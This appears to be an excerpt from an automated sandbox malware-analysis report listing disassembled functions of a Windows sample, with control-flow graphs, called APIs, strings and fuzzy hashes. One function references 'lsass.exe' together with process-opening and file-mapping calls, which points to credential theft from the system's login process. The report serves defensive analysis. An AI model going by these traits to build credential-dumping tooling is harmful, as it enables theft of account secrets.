                                                control_flow_graph 185 7ff72e903650-7ff72e903695 call 7ff72e903278 187 7ff72e90369a-7ff72e9036a2 185->187 188 7ff72e9039db-7ff72e9039f4 187->188 189 7ff72e9036a8-7ff72e9036c9 187->189 190 7ff72e9036d4-7ff72e9036d9 189->190 191 7ff72e9036cb-7ff72e9036d2 189->191 193 7ff72e9036e4-7ff72e9036e9 190->193 194 7ff72e9036db-7ff72e9036e2 190->194 192 7ff72e90371b-7ff72e903725 191->192 197 7ff72e903737-7ff72e903752 192->197 198 7ff72e903727-7ff72e903731 192->198 195 7ff72e9036f4-7ff72e9036f9 193->195 196 7ff72e9036eb-7ff72e9036f2 193->196 194->192 199 7ff72e903704-7ff72e903717 195->199 200 7ff72e9036fb-7ff72e903702 195->200 196->192 202 7ff72e903754-7ff72e903764 call 7ff72e9011dc 197->202 203 7ff72e903769-7ff72e90376e 197->203 198->197 201 7ff72e903733 198->201 199->192 200->192 201->197 202->203 203->188 205 7ff72e903774 203->205 206 7ff72e90377b-7ff72e9037c9 GetModuleHandleW GetProcAddress 205->206 208 7ff72e9037cf-7ff72e9037e6 call 7ff72e9011dc 206->208 209 7ff72e9039cc-7ff72e9039d1 206->209 213 7ff72e9039c2-7ff72e9039c6 LocalFree 208->213 214 7ff72e9037ec-7ff72e9037fa 208->214 209->206 211 7ff72e9039d7 209->211 211->188 213->209 215 7ff72e9039b2-7ff72e9039bc 214->215 215->213 216 7ff72e9037ff-7ff72e903801 215->216 216->213 217 7ff72e903807-7ff72e90381a call 7ff72e9011dc 216->217 217->213 220 7ff72e903820-7ff72e903901 call 7ff72e902344 * 3 call 7ff72e9011dc 217->220 229 7ff72e903955-7ff72e90396e call 7ff72e903a60 220->229 230 7ff72e903903-7ff72e90393f GetModuleHandleW GetProcAddress 220->230 235 7ff72e903976-7ff72e903981 229->235 236 7ff72e903970 LocalFree 229->236 230->229 234 7ff72e903941-7ff72e903950 call 7ff72e9011dc 230->234 234->229 238 7ff72e903983 LocalFree 235->238 239 7ff72e903989-7ff72e903994 235->239 236->235 238->239 240 7ff72e903996 LocalFree 239->240 241 7ff72e90399c-7ff72e9039a3 239->241 240->241 242 7ff72e9039a5 LocalFree 241->242 243 7ff72e9039ab-7ff72e9039af 241->243 242->243 243->215
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLocalModuleProc$File$Pointer$ControlCreateDeviceMemoryProcessWrite
                                                • String ID: LocalAlloc$kernel32
                                                • API String ID: 1403373514-3502785670
                                                • Opcode ID: 1a827ad7871d06135c3d3f7c3b15daf385599e7e3ef9329ebfb9e2afda5a2a80
                                                • Instruction ID: 63372901662c187d0108ae1179ed11243dfa7b90d6bfb5461e95a07efb466f71
                                                • Opcode Fuzzy Hash: 1a827ad7871d06135c3d3f7c3b15daf385599e7e3ef9329ebfb9e2afda5a2a80
                                                • Instruction Fuzzy Hash: 71B10D76B09B06CAEB50EB65E8502AC73B1FB48788F80013ADE8D57758DF38E545CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E902440 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 70memorysleepfileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: DescriptorHeapSecurity$AddressAllocCreateDaclFileHandleInitializeModuleNamedPipeProcProcessSleepWait
                                                • String ID: GetLastError$kernel32
                                                • API String ID: 2144717574-498319287
                                                • Opcode ID: d3ca0b4f129c3ff4b8e511f0660e67add134304a628778553f8f0829a689bfc9
                                                • Instruction ID: c38e371bf2eea97fd10a441d486620214ab0e8576dd5087271afce3e600e1624
                                                • Opcode Fuzzy Hash: d3ca0b4f129c3ff4b8e511f0660e67add134304a628778553f8f0829a689bfc9
                                                • Instruction Fuzzy Hash: 06318531A08A4682EB10AF24E814779B3B0FB45B64FD44239DAAD077D4EF7CD5458B61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E903278 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 213fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 254 7ff72e903278-7ff72e9032b3 255 7ff72e9035ce-7ff72e9035de 254->255 256 7ff72e9032b9-7ff72e9032cc call 7ff72e902ac0 254->256 256->255 258 7ff72e9032d2-7ff72e9032dc 256->258 259 7ff72e9032de-7ff72e903305 CreateFileW 258->259 260 7ff72e90330a-7ff72e903340 RtlInitUnicodeString call 7ff72e90195c 258->260 261 7ff72e903390-7ff72e903396 259->261 265 7ff72e903345-7ff72e903347 260->265 263 7ff72e90339c-7ff72e9033a0 261->263 264 7ff72e90355b 261->264 263->264 266 7ff72e9033a6-7ff72e9033bd call 7ff72e90106c 263->266 268 7ff72e903562-7ff72e903565 264->268 265->264 267 7ff72e90334d-7ff72e903354 265->267 266->264 279 7ff72e9033c3-7ff72e9033ce 266->279 270 7ff72e903362-7ff72e90336d call 7ff72e901a18 267->270 271 7ff72e9035bb-7ff72e9035cb FindCloseChangeNotification 268->271 272 7ff72e903567-7ff72e90356b 268->272 286 7ff72e903356-7ff72e903358 270->286 287 7ff72e90336f-7ff72e90337c LocalFree 270->287 271->255 273 7ff72e9035a5-7ff72e9035a9 LocalFree 272->273 274 7ff72e90356d-7ff72e90356f 272->274 280 7ff72e9035af-7ff72e9035b8 LocalFree 273->280 277 7ff72e903571-7ff72e903573 274->277 278 7ff72e90357c-7ff72e903583 274->278 277->273 282 7ff72e903575-7ff72e903578 277->282 278->280 283 7ff72e903585-7ff72e90358f 278->283 284 7ff72e903446-7ff72e903465 279->284 285 7ff72e9033d0-7ff72e9033e3 call 7ff72e90171c 279->285 280->271 282->280 288 7ff72e90357a 282->288 289 7ff72e903591 UnmapViewOfFile 283->289 290 7ff72e903597-7ff72e90359a 283->290 293 7ff72e90346c-7ff72e90346f 284->293 300 7ff72e9033e5-7ff72e90340c 285->300 301 7ff72e90342b-7ff72e903444 285->301 286->287 292 7ff72e90335a-7ff72e90335f 286->292 287->264 294 7ff72e903382-7ff72e90338a OpenProcess 287->294 288->273 289->290 290->273 296 7ff72e90359c-7ff72e90359f CloseHandle 290->296 292->270 293->268 295 7ff72e903475-7ff72e90348a 293->295 294->261 298 7ff72e90348c-7ff72e903495 295->298 299 7ff72e903497 295->299 296->273 298->299 302 7ff72e9034a1-7ff72e9034b5 call 7ff72e901a64 298->302 299->302 303 7ff72e903421-7ff72e903429 300->303 304 7ff72e90340e-7ff72e903412 300->304 301->293 302->264 308 7ff72e9034bb-7ff72e9034c1 302->308 303->293 304->268 306 7ff72e903418-7ff72e90341b 304->306 306->268 306->303 308->264 309 7ff72e9034c7-7ff72e903535 call 7ff72e903e00 308->309 311 7ff72e90353a-7ff72e90353c 309->311 311->264 312 7ff72e90353e-7ff72e903559 311->312 312->255 312->264
                                                APIs
                                                • CreateFileW.KERNEL32 ref: 00007FF72E9032FF
                                                • RtlInitUnicodeString.NTDLL ref: 00007FF72E90332E
                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,?,00007FF72E9025E9,00007FF72E90369A), ref: 00007FF72E903373
                                                • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,?,00007FF72E9025E9,00007FF72E90369A), ref: 00007FF72E90338A
                                                • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,?,00007FF72E9025E9,00007FF72E90369A), ref: 00007FF72E903591
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,?,00007FF72E9025E9,00007FF72E90369A), ref: 00007FF72E90359F
                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,?,00007FF72E9025E9,00007FF72E90369A), ref: 00007FF72E9035A9
                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,?,00007FF72E9025E9,00007FF72E90369A), ref: 00007FF72E9035B2
                                                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00000001,?,00007FF72E9025E9,00007FF72E90369A), ref: 00007FF72E9035C5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: FreeLocal$CloseFile$ChangeCreateFindHandleInitNotificationOpenProcessStringUnicodeUnmapView
                                                • String ID: lsass.exe
                                                • API String ID: 34978191-3024872867
                                                • Opcode ID: f26b98aaa51834c4da608bd926982403fc55e1899fdd91af25bb406dcc5f2fcf
                                                • Instruction ID: 6a054f3080bb834b2768fa924c315a4c82d253b5cc02d6a966f0e67625d8da5a
                                                • Opcode Fuzzy Hash: f26b98aaa51834c4da608bd926982403fc55e1899fdd91af25bb406dcc5f2fcf
                                                • Instruction Fuzzy Hash: 7FA14671A09A028AFB14EF15EC4057CB3A0FF84B94FC4513BD98D5BAA4DF3DA5458B22
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E90207C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 92libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProc$FreeLocal$FilePointer$ControlDeviceMemoryProcessWrite
                                                • String ID: LocalAlloc$kernel32
                                                • API String ID: 1566430793-3502785670
                                                • Opcode ID: 77b3b3077083457f454160817387a736409e1daf99480078890e869b7eff82a6
                                                • Instruction ID: 34c55d1ae938fcc432478311a17e024011f7375bf6add4cb6c4abc03b3cdc1d1
                                                • Opcode Fuzzy Hash: 77b3b3077083457f454160817387a736409e1daf99480078890e869b7eff82a6
                                                • Instruction Fuzzy Hash: 99413176B04B06DAEB50EF61E8441AC7374FB44B48BC4443ACA4D43B59EF38E659CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E90443C Relevance: 15.1, APIs: 10, Instructions: 87COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: _amsg_exit$CommandInitializeLine__wsetargv_cinit
                                                • String ID:
                                                • API String ID: 2949660345-0
                                                • Opcode ID: 2363d71b0307cd564027734d8d415752cf8de78fb711bb724591f5801a928425
                                                • Instruction ID: ff5948ed0288c3e0da74b0c6d2a761fecf36c14570ff041dad2e4b53b31a229c
                                                • Opcode Fuzzy Hash: 2363d71b0307cd564027734d8d415752cf8de78fb711bb724591f5801a928425
                                                • Instruction Fuzzy Hash: E931E820E0865386FB64BB65EC552BDA295EF42344FC0443FD6DD862D3DE2CA9808E73
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E906734 Relevance: 10.7, APIs: 7, Instructions: 184COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 402 7ff72e906734-7ff72e906773 GetStartupInfoW call 7ff72e9075a0 405 7ff72e906775-7ff72e906778 402->405 406 7ff72e90677d-7ff72e906795 402->406 407 7ff72e9069e8-7ff72e906a05 405->407 408 7ff72e9067dc-7ff72e9067e2 406->408 409 7ff72e906797 406->409 411 7ff72e90691c-7ff72e90691f 408->411 412 7ff72e9067e8-7ff72e9067f0 408->412 410 7ff72e90679b-7ff72e9067d4 409->410 410->410 415 7ff72e9067d6 410->415 414 7ff72e906922-7ff72e90692e 411->414 412->411 413 7ff72e9067f6-7ff72e90680c 412->413 416 7ff72e906812 413->416 417 7ff72e906899-7ff72e90689e 413->417 418 7ff72e906941-7ff72e90696a GetStdHandle 414->418 419 7ff72e906930-7ff72e906935 414->419 415->408 420 7ff72e906819-7ff72e906829 call 7ff72e9075a0 416->420 417->411 424 7ff72e9068a0-7ff72e9068a5 417->424 422 7ff72e90696c-7ff72e90696f 418->422 423 7ff72e9069b9-7ff72e9069be 418->423 419->418 421 7ff72e906937-7ff72e90693c 419->421 435 7ff72e906893 420->435 436 7ff72e90682b-7ff72e906846 420->436 426 7ff72e9069c6-7ff72e9069d4 421->426 422->423 427 7ff72e906971-7ff72e90697c GetFileType 422->427 423->426 428 7ff72e90690f-7ff72e90691a 424->428 429 7ff72e9068a7-7ff72e9068ac 424->429 426->414 431 7ff72e9069da-7ff72e9069e6 SetHandleCount 426->431 427->423 432 7ff72e90697e-7ff72e906988 427->432 428->411 428->424 429->428 433 7ff72e9068ae-7ff72e9068b3 429->433 431->407 437 7ff72e906991-7ff72e906994 432->437 438 7ff72e90698a-7ff72e90698f 432->438 433->428 434 7ff72e9068b5-7ff72e9068ba 433->434 439 7ff72e9068bc-7ff72e9068c8 GetFileType 434->439 440 7ff72e9068ca-7ff72e906906 InitializeCriticalSectionAndSpinCount 434->440 435->417 441 7ff72e906889-7ff72e90688f 436->441 442 7ff72e906848 436->442 443 7ff72e90699b-7ff72e9069ad InitializeCriticalSectionAndSpinCount 437->443 444 7ff72e906996 437->444 438->443 439->428 439->440 440->405 446 7ff72e90690c 440->446 441->420 448 7ff72e906891 441->448 447 7ff72e90684c-7ff72e906881 442->447 443->405 445 7ff72e9069b3-7ff72e9069b7 443->445 444->443 445->426 446->428 447->447 449 7ff72e906883 447->449 448->417 449->441
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: CountCriticalFileInfoInitializeSectionSleepSpinStartupType
                                                • String ID:
                                                • API String ID: 3473179607-0
                                                • Opcode ID: b91d4d52e98355c8f1f8211771a9aa0a60105c8cd0f9cf77b976f6f64b7dcd0b
                                                • Instruction ID: 8c891559ac899263c4d2cd2c9ef846adc345af5b5f777a00ef2bf26fef753d8b
                                                • Opcode Fuzzy Hash: b91d4d52e98355c8f1f8211771a9aa0a60105c8cd0f9cf77b976f6f64b7dcd0b
                                                • Instruction Fuzzy Hash: A5819031A0978285EB54EF14D944369A6A0FB447B4FD4433ECABE06AD1EF3CE455CB22
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E901478 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128librarymemoryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: Local$AddressAllocFreeHandleModuleProc
                                                • String ID: LocalAlloc$kernel32
                                                • API String ID: 3402345641-3502785670
                                                • Opcode ID: 825a19b07b84a507a4d5b7b5605b7bf3c615a8c00f9681e35ec37bf58e192535
                                                • Instruction ID: b3e54aa3dfb830e43f8745a6447a4b65cd40ba03428f39b04d9a1145c9d574a2
                                                • Opcode Fuzzy Hash: 825a19b07b84a507a4d5b7b5605b7bf3c615a8c00f9681e35ec37bf58e192535
                                                • Instruction Fuzzy Hash: EC517032B14A4689EB10DF66EC506AC73B4FB48B98BC8403ADE8D57B54DF38D441CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E905A5C Relevance: 10.6, APIs: 7, Instructions: 98COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • _lock.LIBCMT ref: 00007FF72E905A85
                                                  • Part of subcall function 00007FF72E90749C: _amsg_exit.LIBCMT ref: 00007FF72E9074C6
                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF72E905C49,?,?,00000000,00007FF72E9074CB), ref: 00007FF72E905AB8
                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF72E905C49,?,?,00000000,00007FF72E9074CB), ref: 00007FF72E905AD6
                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF72E905C49,?,?,00000000,00007FF72E9074CB), ref: 00007FF72E905B16
                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF72E905C49,?,?,00000000,00007FF72E9074CB), ref: 00007FF72E905B30
                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF72E905C49,?,?,00000000,00007FF72E9074CB), ref: 00007FF72E905B40
                                                • ExitProcess.KERNEL32 ref: 00007FF72E905BCC
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: DecodePointer$ExitProcess_amsg_exit_lock
                                                • String ID:
                                                • API String ID: 3411037476-0
                                                • Opcode ID: d5a1111323d63d3ab070b5611baeabd23b8252cef294cc46292b54eb86873553
                                                • Instruction ID: 41e359a522b1ae8ba25b41c80f78c1d2c3f53e81ae745c04195f81fc689c4b26
                                                • Opcode Fuzzy Hash: d5a1111323d63d3ab070b5611baeabd23b8252cef294cc46292b54eb86873553
                                                • Instruction Fuzzy Hash: 13415A31A1DA0285EB60BB12EC40239E294FF88794FC0043EDACD467A5DF7DE4558B62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E908FBC Relevance: 4.5, APIs: 3, Instructions: 46memoryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: AllocateHeap_callnewh_errno
                                                • String ID:
                                                • API String ID: 638267422-0
                                                • Opcode ID: d4b0a0cddf9340da4178819d750a398d4bc5387aadb62519f9694761d6e85c4a
                                                • Instruction ID: f19f5d64abcab9037d6e4f75658326ebcb58ca17dd71924a4103e5c5842da8ec
                                                • Opcode Fuzzy Hash: d4b0a0cddf9340da4178819d750a398d4bc5387aadb62519f9694761d6e85c4a
                                                • Instruction Fuzzy Hash: 5911A961B09202C5FF656B21DE44379E2A1DF947D0FC8463ACE5D476C4DE7C95808A62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E902554 Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: DescriptorHandleHeapSecurity$AddressAdjustAllocCloseCreateDaclFileInitializeModuleNumbersPrivilegeProcProcessSleepVersion
                                                • String ID:
                                                • API String ID: 366963940-0
                                                • Opcode ID: ab0f27c1ac3c09a6cd72c127b3178ba9f34a204990932a602f660392d8694354
                                                • Instruction ID: dd08b10de7664bba7e865d13397c38e3f876bd3e518d2d4b21c29dc845e6fefe
                                                • Opcode Fuzzy Hash: ab0f27c1ac3c09a6cd72c127b3178ba9f34a204990932a602f660392d8694354
                                                • Instruction Fuzzy Hash: B3114631A09A0795EB10AB10EC581B9B360FF40728FC0023BD5AD866A1DF7DE248CF62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E906A78 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: Heap$CreateInformationVersion
                                                • String ID:
                                                • API String ID: 3563531100-0
                                                • Opcode ID: bc8963bedb4d6625ef62e5a19f6952fdb0d1d82dbc8686983af6f38e3a97b8b6
                                                • Instruction ID: 84a0a3b84259957866b210e658c217f96809545079a24a636dc444346cca034d
                                                • Opcode Fuzzy Hash: bc8963bedb4d6625ef62e5a19f6952fdb0d1d82dbc8686983af6f38e3a97b8b6
                                                • Instruction Fuzzy Hash: 16E0ED30A18A4282FF84BB15EC08735A260FF98340FC0443EE88E02794DF7CA0458E22
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E9066AC Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635950287.00007FF72E90A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635966372.00007FF72E90E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000004.00000002.1635980845.00007FF72E911000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_7ff72e900000_F2CD.jbxd
                                                Similarity
                                                • API ID: EnvironmentStrings$Free
                                                • String ID:
                                                • API String ID: 3328510275-0
                                                • Opcode ID: c88ab88cde072da99d442b396e127fe24ba6e3caff571b87e746a65db5771d56
                                                • Instruction ID: 5425b9c4016ecd63667d2110f7ef02d0894a22a1be9523659c346f91cc9ceead
                                                • Opcode Fuzzy Hash: c88ab88cde072da99d442b396e127fe24ba6e3caff571b87e746a65db5771d56
                                                • Instruction Fuzzy Hash: A8018451E0975185EE517B56E841039A2A0EF48BD0BC8403ADE8E07B85EF2CE4818B51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FF72E907520 Relevance: 2.5, APIs: 2, Instructions: 35sleepCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • malloc.LIBCMT ref: 00007FF72E90754B
                                                  • Part of subcall function 00007FF72E908D54: _FF_MSGBANNER.LIBCMT ref: 00007FF72E908D84
                                                  • Part of subcall function 00007FF72E908D54: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF72E907550,?,?,?,00007FF72E907415,?,?,?,00007FF72E9074BF), ref: 00007FF72E908DA9
                                                  • Part of subcall function 00007FF72E908D54: _callnewh.LIBCMT ref: 00007FF72E908DC2
                                                  • Part of subcall function 00007FF72E908D54: _errno.LIBCMT ref: 00007FF72E908DCD
                                                  • Part of subcall function 00007FF72E908D54: _errno.LIBCMT ref: 00007FF72E908DD8
                                                • Sleep.KERNEL32(?,?,?,00007FF72E907415,?,?,?,00007FF72E9074BF), ref: 00007FF72E90755E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1635936055.00007FF72E901000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF72E900000, based on PE: true
                                                • Associated: 00000004.00000002.1635923667.00007FF72E900000.00000002.00000001.01000000.00000007.sdmpDownload File
